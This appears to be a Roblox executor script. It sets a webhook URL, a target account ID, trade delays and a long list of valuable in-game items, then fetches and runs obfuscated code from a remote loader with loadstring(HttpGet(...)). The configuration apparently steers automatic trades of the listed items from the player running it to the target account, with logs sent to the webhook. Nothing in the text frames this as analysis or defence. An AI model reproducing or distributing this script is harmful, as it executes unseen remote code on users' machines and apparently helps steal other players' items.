getgenv().WEBHOOK_URL = "https://skama.net/api/logs/webhook/mrr_9f7f2fa945a44cbcbca03ad7a6b7f71c"
getgenv().TARGET_ID = 8160545590
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Tacorita Bicicleta"] = true,
    ["La Extinct Grande"] = true,
    ["La Spooky Grande"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Tuff Toucan"] = true,
    ["Gobblino Uniciclino"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["La Taco Combinasion"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Festive 67"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Money Money Puggy"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Brunito Marsito"] = true,
    ["Mariachi Corazoni"] = true,
    ["Swag Soda"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Tralaledon"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Spaghettis"] = true,
    ["Love Love Bear"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Reinito Sleighito"] = true,
    ["Cooki and Milki"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["La Grande Combinasion"] = true,
    ["Spinny Hammy"] = true,
    ["Los Planitos"] = true,
    ["Los Mobilis"] = true,
    ["Los Candies"] = true,
    ["Bacuru and Egguru"] = true,
    ["Money Money Reindeer"] = true,
    ["Eviledon"] = true,
    ["Orcaledon"] = true,
    ["Los 25"] = true,
    ["La Ginger Sekolah"] = true,
    ["Quesadilla Crocodila"] = true,
    ["Mi Gatito"] = true,
    ["Burrito Bandito"] = true,
    ["Los Quesadillas"] = true,
    ["Arcadopus"] = true,
    ["Los Burritos"] = true,
    ["67"] = true,
    ["Los 67"] = true,
    ["Rosetti Tualetti"] = true,
    ["Sammyni Fattini"] = true,
    ["Spaghetti Tualetti"] = true,
    ["La Food Combinasion"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Amigos"] = true,
    ["Lovin Rose"] = true,
    ["Los Mi Gatitos"] = true,
    ["Los Chicleteiras"] = true,
    ["Los Combinasionas"] = true,
    ["Los Puggies"] = true,
    ["Esok Sekolah"] = true,
    ["Perrito Burrito"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Los Nooo My Hotspotsitos"] = true,
    ["Chimnino"] = true,
    ["Noo my Heart"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Love Love Love Sahur"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Las Sis"] = true,
    ["Chill Puppy"] = true,
    ["Rosey and Teddy"] = true,
    ["Ginger Gerat"] = true,
    ["Fishino Clownino"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Strawberry Elephant"] = true,
    ["Skibidi Toilet"] = true,
    ["Meowl"] = true,
    ["Pirulitoita Bicicleteira"] = true,
    ["Guest 666"] = true,
    ["Los Sekolahs"] = true,
    ["Ketupat Bros"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Los Sweethearts"] = true,
    ["Please my Present"] = true,
    ["Cupid Hotspot"] = true,
    ["Noo my Candy"] = true,
    ["Noo my Present"] = true,
    ["Naughty Naughty"] = true,
    ["Nooo My Hotspot"] = true,
    ["Horegini Boom"] = true,
    ["Rang Ring Bus"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
